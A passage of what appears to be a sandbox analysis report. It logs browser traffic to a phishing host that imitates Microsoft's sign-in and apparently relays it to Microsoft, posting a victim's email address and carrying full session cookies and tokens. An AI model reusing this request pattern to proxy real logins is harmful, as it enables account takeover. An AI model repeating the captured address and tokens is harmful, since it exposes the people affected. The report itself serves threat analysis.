                                                                                                                          2024-02-02 19:17:55 UTC1592INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c
                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          59192.168.2.1649791172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:55 UTC3318OUTPOST /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 2071
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          hpgrequestid: 2c88ca5a-08bf-4ce2-abba-d835a85ac200
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          client-request-id: c9bbf586-3cb7-49e4-968c-855cb9b06dff
                                                                                                                          canary: PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-mH775_Mfw0vDG2riBs6r6rojSEkpuS7X4o6qDr1pTtuK0rWXHfSdH2s7naoKDHpsfSpT0mmOTD0j2H6qetptWv06tmjLsKbA0ZkGfNFjDAijrPADp-2cQdNnEKkF3GsqKaZMry80a1AGWMOGiaYPfpzvoNDBbd2j2MFTDuRgHPtHCrvnpFYQaaOq--8zxnxpdwfohDDtFVCyXK2Fi1xaryAA
                                                                                                                          Content-type: application/json; charset=UTF-8
                                                                                                                          hpgid: 1104
                                                                                                                          Accept: application/json
                                                                                                                          hpgact: 1800
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:17:55 UTC2071OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 22 2c 22 69 73 4f 74 68 65 72 49 64 70 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 68 65 63 6b 50 68 6f 6e 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 52 65 6d 6f 74 65 4e 47 43 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 69 73 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 53 68 6f 77 6e 22 3a 66 61 6c 73 65 2c 22 69 73 46 69 64 6f 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 6f 72 69 67 69 6e 61 6c 52 65 71 75 65 73 74 22 3a 22 72 51 51 49 41 52 41 41 68 5a 49 37 6a 4e 4e 32 41 4d 62 6a 35 43 37 4e 52 62 53 63 61 49 56 67 4f 31 55 64 55 41 38 6e 39 74 2d 76 2d 41 53 44 53 78 4c 48 4f 66 2d 64 68 4c 50 6a 32 4b 70 6b 6e 52 39 78 5f 49 34 54 78 33 6e 4d 4c 51 4b
                                                                                                                          Data Ascii: {"username":"sales@dudick.com","isOtherIdpSupported":true,"checkPhones":false,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":true,"originalRequest":"rQQIARAAhZI7jNN2AMbj5C7NRbScaIVgO1UdUA8n9t-v-ASDSxLHOf-dhLPj2KpknR9x_I4Tx3nMLQK
                                                                                                                          2024-02-02 19:17:56 UTC1087INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:56 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Client-Request-Id: c9bbf586-3cb7-49e4-968c-855cb9b06dff
                                                                                                                          Expires: -1
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; Path=/; Expires=Sun, 03 Mar 2024 19:17:56 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          X-Ms-Ests-Server: 2.1.17184.4 - NCUS ProdSlices
                                                                                                                          X-Ms-Request-Id: 0b28787d-43be-42fe-99c9-3cc514141f00
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6f069f3b0c3-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:56 UTC282INData Raw: 35 36 34 0d 0a 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 22 2c 22 44 69 73 70 6c 61 79 22 3a 22 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 22 2c 22 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 22 3a 35 2c 22 49 73 55 6e 6d 61 6e 61 67 65 64 22 3a 66 61 6c 73 65 2c 22 54 68 72 6f 74 74 6c 65 53 74 61 74 75 73 22 3a 30 2c 22 43 72 65 64 65 6e 74 69 61 6c 73 22 3a 7b 22 50 72 65 66 43 72 65 64 65 6e 74 69 61 6c 22 3a 31 2c 22 48 61 73 50 61 73 73 77 6f 72 64 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 65 4e 67 63 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 69 64 6f 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 51 72 43 6f 64 65 50 69 6e 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 53 61 73 50 61 72 61 6d 73 22 3a 6e 75 6c
                                                                                                                          Data Ascii: 564{"Username":"sales@dudick.com","Display":"sales@dudick.com","IfExistsResult":5,"IsUnmanaged":false,"ThrottleStatus":0,"Credentials":{"PrefCredential":1,"HasPassword":true,"RemoteNgcParams":null,"FidoParams":null,"QrCodePinParams":null,"SasParams":nul
                                                                                                                          2024-02-02 19:17:56 UTC1105INData Raw: 6f 67 6c 65 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 61 63 65 62 6f 6f 6b 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 4f 74 63 4e 6f 74 41 75 74 6f 53 65 6e 74 22 3a 66 61 6c 73 65 7d 2c 22 45 73 74 73 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 55 73 65 72 54 65 6e 61 6e 74 42 72 61 6e 64 69 6e 67 22 3a 6e 75 6c 6c 2c 22 44 6f 6d 61 69 6e 54 79 70 65 22 3a 33 7d 2c 22 46 6c 6f 77 54 6f 6b 65 6e 22 3a 22 41 51 41 42 41 41 45 41 41 41 41 6d 6f 46 66 47 74 59 78 76 52 72 4e 72 69 51 64 50 4b 49 5a 2d 45 75 63 6a 46 53 65 6b 7a 4a 4f 6d 34 67 78 4d 73 71 33 4c 48 55 52 56 52 66 53 52 62 7a 52 77 59 66 43 6e 4c 53 78 48 59 37 67 67 39 48 77 57 72 4c 74 57 62 78 6d 5a 45 45 58 68 6c 72 6a 36 54 6d 47 4f 61 59 79 43 55 36 72 73 6e 73 6c 70 33 79 4f 2d 35 6f 48
                                                                                                                          Data Ascii: ogleParams":null,"FacebookParams":null,"OtcNotAutoSent":false},"EstsProperties":{"UserTenantBranding":null,"DomainType":3},"FlowToken":"AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-EucjFSekzJOm4gxMsq3LHURVRfSRbzRwYfCnLSxHY7gg9HwWrLtWbxmZEEXhlrj6TmGOaYyCU6rsnslp3yO-5oH
                                                                                                                          2024-02-02 19:17:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          60192.168.2.1649792172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:56 UTC1840OUTGET /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
                                                                                                                          2024-02-02 19:17:57 UTC1029INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:57 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; Path=/; Expires=Sun, 03 Mar 2024 19:17:56 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          X-Ms-Ests-Server: 2.1.17216.2 - EUS ProdSlices
                                                                                                                          X-Ms-Request-Id: 27d1ec6b-fca3-4a42-8230-27a46454ca00
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6f64bca53f9-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:57 UTC170INData Raw: 61 34 0d 0a 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 61 38 39 34 66 38 61 31 2d 61 34 62 31 2d 34 61 34 66 2d 38 62 61 31 2d 61 65 31 36 36 36 31 39 37 61 66 37 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 32 2d 30 32 20 31 39 3a 31 37 3a 35 36 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d 0d 0a
                                                                                                                          Data Ascii: a4{"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"a894f8a1-a4b1-4a4f-8ba1-ae1666197af7","timestamp":"2024-02-02 19:17:56Z","message":"AADSTS900561"}}
                                                                                                                          2024-02-02 19:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          61192.168.2.1649794104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:56 UTC2144OUTGET /oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; uaid=b0dc3974b8144bacb6be6048a6beb6a3; MSPRequ=id=N&lt=1706901474&co=4
                                                                                                                          2024-02-02 19:17:57 UTC1304INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:57 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Fri, 02 Feb 2024 19:16:56 GMT
                                                                                                                          Link: <https://logincdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://acctcdn.msauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://acctcdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://acctcdn.msauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://acctcdn.msftauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://acctcdnmsftuswe2.azureedge.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://acctcdnvzeuno.azureedge.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://logincdn.msauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://logincdn.msftauth.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://lgincdnvzeuno.azureedge.net/>; rel=dns-prefetch
                                                                                                                          Link: <https://lgincdnmsftuswe2.azureedge.net/>; rel=dns-prefetch
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF0002CF63 V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901476&co=5; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: uaid=c9bbf5863cb749e4968c855cb9b06dff; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          2024-02-02 19:17:57 UTC268INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4d 53 43 43 3d 31 34 33 2e 31 31 30 2e 32 31 39 2e 31 35 31 2d 43 41 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 3b 20 45 78 70 69 72 65 73 3d 57 65 64 2c 20 32 36 20 46 65 62 20 32 30 32 35 20 31 39 3a 31 37 3a 35 36 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4d 53 50 4f 4b 3d 24 75 75 69 64 2d 66 65 65 61 30 35 63 61 2d 31 34 30 38 2d 34 39 63 39 2d 61 30 30 31 2d 61 64 39 37 36 37 33 65 37 33 36 63 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                          Data Ascii: Set-Cookie: MSCC=143.110.219.151-CA; Path=/; Domain=ywnjb.q2zg22.ru; Expires=Wed, 26 Feb 2025 19:17:56 GMT; HttpOnly; Secure; SameSite=NoneSet-Cookie: MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; Sa
                                                                                                                          2024-02-02 19:17:57 UTC1879INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 50 61 72 61 6d 73 3d 31 31 4f 2e 44 71 77 37 6f 4d 73 6e 46 52 6e 49 59 71 73 70 63 4a 62 4c 49 78 4b 63 61 6d 48 79 68 39 44 53 52 72 46 51 4f 67 2a 4e 6b 34 42 45 49 44 21 74 62 38 36 6e 77 66 46 61 34 31 48 50 32 50 75 41 57 73 37 74 35 33 32 4a 6c 77 54 36 69 71 4a 68 57 47 71 33 79 75 46 49 62 65 6e 53 6f 30 55 59 45 34 39 38 57 66 21 4b 48 43 67 4c 46 44 64 44 6c 51 77 64 77 32 6f 74 46 50 54 33 37 57 52 7a 4d 4c 59 6f 31 72 75 69 75 6c 62 62 68 59 72 32 6b 53 42 48 70 71 58 46 31 43 49 68 68 51 4a 4a 61 50 2a 71 41 36 49 54 38 30 5a 56 54 4d 42 79 48 75 6c 37 5a 6b 67 6e 61 4e 73 6c 72 58 4c 50 4d 50 30 4f 4d 39 6d 6d 36 65 51 2a 5a 76 6b 30 38 33 42 70 52 42 69 38 4a 69 75 63 59 38 31 63 55 2a 31 66 48 5a 34
                                                                                                                          Data Ascii: Set-Cookie: OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4
